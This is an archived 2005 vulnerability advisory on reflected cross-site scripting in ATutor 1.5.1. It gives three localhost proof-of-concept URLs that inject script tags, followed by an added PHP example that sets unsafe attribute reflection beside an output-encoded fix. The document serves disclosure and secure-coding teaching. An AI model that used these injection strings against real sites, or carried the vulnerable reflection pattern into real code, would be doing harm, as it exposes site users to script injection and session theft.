atutor151.txt

2005-08-19T00:00:00
ID PACKETSTORM:39484
Type packetstorm
Reporter matrix killer
Modified 2005-08-19T00:00:00

Description

                                        
`ATutor 1.5.1 and prior multiple XSS Vulnerabilities  
  
SEVERITY:  
=========  
Medium  
  
SOFTWARE:  
=========  
ATutor 1.5.1  
http://www.atutor.ca/  
  
INFO:  
=====  
ATutor 1.5.1 is a web-based education portal.  
  
DESCRIPTION:  
============  
The system is vulnerable to various XSS attacks:  
  
  
--==XSS==--  
  
Some examples -  
  
http://localhost/tour/login.php?course="><script>alert('Matrix_Killer r0X');</script>  
  
http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There is no other place like 127.0.0.1');</script>&include=all&find_in=all&display_as=pages  
  
http://localhost/tour/search.php?search=1&words="><script>alert('Found By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search  
  
VENDOR STATUS:  
==============  
Vendor was contacted, but no response has been received to date.  
  
CREDITS:  
========  
This vulnerability was discovered and researched by   
matrix_killer of h4cky0u Security Forums.  
  
mail : matrix_k at abv.bg  
  
web : http://www.h4cky0u.org  
  
  
Co-Researcher:  
h4cky0u of h4cky0u Security Forums.  
  
mail : h4cky0u at gmail.com  
  
web : http://www.h4cky0u.org  
  
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!  
  
ORIGINAL:  
=========  
http://h4cky0u.org/viewtopic.php?t=2094  
  
--   
http://www.h4cky0u.org  
(In)Security at its best...  
`
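
The test strings in the advisory all begin with "> before the script tag, the pattern that closes a double-quoted HTML attribute when a request value is echoed into it unencoded. The PHP below is an added example, not ATutor's code and not part of the original advisory: the form markup and function names are hypothetical, and only the parameter names course and words come from the advisory. It shows the unencoded reflection beside the output-encoded form.

```php
<?php
// Added illustration; this is NOT ATutor's source code. The markup and the
// function names are hypothetical. Only the parameter names `course` and
// `words` are taken from the advisory.

// Vulnerable pattern: the request value is copied into a double-quoted
// attribute unchanged, so a value containing "> ends the attribute and tag.
function render_course_field_unsafe(array $query): string
{
    $course = $query['course'] ?? '';
    return '<input type="hidden" name="course" value="' . $course . '">';
}

// Encode for the HTML context at the point of output. ENT_QUOTES covers both
// quote styles; ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead of
// making htmlspecialchars() return an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Read a parameter as a string; array-valued input (course[]=...) becomes ''.
function param(array $query, string $name): string
{
    $value = $query[$name] ?? '';
    return is_string($value) ? $value : '';
}

function render_course_field(array $query): string
{
    return '<input type="hidden" name="course" value="'
        . h(param($query, 'course')) . '">';
}

function render_search_field(array $query): string
{
    return '<input type="text" name="words" value="'
        . h(param($query, 'words')) . '">';
}

// Constructed sample input with the same shape as the advisory's test strings.
$sample = ['course' => '"><script>alert(1)</script>', 'words' => ['x']];
echo render_course_field_unsafe($sample), "\n"; // attribute is closed early
echo render_course_field($sample), "\n";        // value stays inside the attribute
echo render_search_field($sample), "\n";        // array input rendered as empty
```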